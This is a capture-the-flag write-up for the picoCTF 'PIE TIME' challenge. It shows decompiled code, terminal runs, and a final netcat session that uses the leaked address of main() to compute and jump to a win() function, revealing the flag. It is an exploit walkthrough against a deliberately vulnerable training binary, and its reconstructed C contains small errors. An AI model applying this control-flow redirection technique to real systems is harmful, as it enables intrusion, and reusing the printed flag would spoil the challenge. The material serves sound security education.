PicoCTF Writeup - PIE TIME#

PicoCTF Challenge: https://play.picoctf.org/practice/challenge/490?category=6&page=1

PIE TIME#
Author: Darkraicg492
Description#
Can you try to get the flag? Beware we have PIE!
Additional details will be available after launching your challenge instance.
Hints#
1st - Can you figure out what changed between the address you found locally and in the server output?
Resources:#
Source Code: /vuln.c
Binary: /vuln

1
$ nc rescued-float.picoctf.net 59097

Decompile#

We can decompile the binary to a pseudo C like this (Binary Ninja):

1
00401289    void segfault_handler() __noreturn
2

3
00401289    {
4
00401289        puts("Segfault Occurred, incorrect add…");
5
004012a2        exit(0);
6
004012a2        /* no return */
7
00401289    }
8

9
/* ... */
10

11
004012a7    int win()
12
004012a7    /* all puts, putchar should be changed to printf() */
13

14
004012a7    {
15
004012a7        puts("You won!");
16
004012cd        FILE* fp = fopen("flag.txt", "r");
17
004012cd
18
004012db        if (!fp)
19
004012db        {
20
004012ff            puts("Cannot open file.");
21
004012ee            exit(0);
22
004012ee            /* no return */
23
004012db        }
24
004012db
25

26
00401322        char i = fgetc(fp);
27
00401322        while (i != EOF) { /* 0xff => EOF */
28
00401322            putchar(i)
29
00401322        }
30

31
00401322
32
00401329        putchar("\n"); /* \n in ASCII code (line-break) */
33
0040133c        return fclose(fp);
34
004012a7    }
35

36

37
/* ... */
38

39
0040133d    int main()
40
0040133d    /* int32_t argc => Not used */
41
0040133d    /* char** argv => Not used */
42
0040133d    /* char** envp => Not used */
43

44
0040133d    {
45
0040133d        void* fsbase;
46
00401349        int64_t rax = *(uint64_t*)((char*)fsbase + 0x28);
47
00401349        /* No needed */
48

49
00401364        signal(SIGSEGV, segfault_handler); /* 0xb => SIGSEGV */
50
00401382        setvbuf(stdout, NULL, _IONBF, 0);
51
00401382        /* __TMC_END__ => stdout */
52
00401382        /* nullptr => NULL */
53
00401382        /* 2 => _IONBF (no buffering) */
54

55

56
0040139a        printf("Address of main: %p\n", &main);
57
0040139a        /* &main to show memory pointer */
58

59
004013ab        printf("Enter the address to jump to, ex => 0x12345: ");
60
004013c3        unsigned long buffer;
61
004013c3        /* var_20 => buffer (stores a memory address) */
62
004013c3        scanf("%lx", &buffer);
63
004013c3        /* __isoc99_scanf => scanf */
64

65
004013db        printf("Your input: %lx\n", buffer);
66

67
004013ec        void (*target_func)(void) = (void (*)())buffer;
68
004013ec        /* need to declare as a function before jump */
69
004013ec        target_func();
70
004013ec        /* jump to the memory location that user provided */
71

72
004013ec
73
00401400        /* Useless from below here */
74
00401400        if (rax == *(uint64_t*)((char*)fsbase + 0x28))
75
00401408            return 0;
76
00401408
77
00401402        __stack_chk_fail();
78
00401402        /* no return */
79
0040133d    }

This is the full source code (decompiled):

1
void segfault_handler()
2
{
3
    printf("Segfault Occurred, incorrect address.");
4
    exit(0);
5
}
6

7
int win()
8
{
9
    printf("You won!");
10
    FILE* fp = fopen("flag.txt", "r");
11
    if (!fp)
12
    {
13
        printf("Cannot open file.");
14
        exit(0);
15
    }
16

17
    char i = fgetc(fp);
18
    while (i != EOF) {
19
        printf("%c", i)
20
    }
21

22
    printf("\n");
23
    return fclose(fp);
24
}
25

26
int main()
27
{
28
    signal(SIGSEGV, segfault_handler);
29
    setvbuf(stdout, NULL, _IONBF, 0);
30

31
    printf("Address of main: %p\n", &main);
32
    printf("Enter the address to jump to, ex => 0x12345: ");
33
    unsigned long buffer;
34
    scanf("%lx", &buffer);
35
    printf("Your input: %lx\n", buffer);
36

37
    void (*target_func)(void) = (void (*)())buffer;
38
    target_func();
39
}

Analysis#

This program directly jumps to the memory address provided by the user. Additionally, it automatically reveals the address of the main() function. By using this address, the user can infer the address of the win() function. If the correct address is entered, the program will print the flag.

1
004012a7    int64_t win() /* 0x0004012a7 */

1
therustymate-picoctf@webshell:~$ vuln
2
-bash: vuln: command not found
3

4
therustymate-picoctf@webshell:~$ ./vuln
5
Address of main: 0x564a8857633d
6
Enter the address to jump to, ex => 0x12345: 0x0004012a7
7
Your input: 4012a7
8
Segfault Occurred, incorrect address.
9

10
therustymate-picoctf@webshell:~$ ./vuln
11
Address of main: 0x55958f4eb33d
12
Enter the address to jump to, ex => 0x12345: 0x4012a7
13
Your input: 4012a7
14
Segfault Occurred, incorrect address.
15

16
therustymate-picoctf@webshell:~$ ./vuln
17
Address of main: 0x56426097933d
18
Enter the address to jump to, ex => 0x12345: 004012a
19
Your input: 4012a
20
Segfault Occurred, incorrect address.
21

22
therustymate-picoctf@webshell:~$ ./vuln
23
Address of main: 0x55d43b65e33d
24
Enter the address to jump to, ex => 0x12345: 0x55343b64012a
25
Your input: 55343b64012a
26
Segfault Occurred, incorrect address.
27

28
therustymate-picoctf@webshell:~$ ./vuln
29
Address of main: 0x560ada01333d
30
Enter the address to jump to, ex => 0x12345: 0x560ada0132ㅁ7
31
Your input: 560ada0132
32
Segfault Occurred, incorrect address.

Notice that the main() function offset 33d does not change.
Therefore, the base address is 0xXXXXXXXX+func (3 bytes)

This suggests that the input should be: 0xXXXXXXXX2a7 in order to jump to the win() function.

1
therustymate-picoctf@webshell:~$ nc rescued-float.picoctf.net 59097
2
Address of main: 0x5fd38eed433d
3
Enter the address to jump to, ex => 0x12345: 0x5fd38eed42a7
4
Your input: 5fd38eed42a7
5
You won!
6
picoCTF{b4s1c_p051t10n_1nd3p3nd3nc3_00dea386}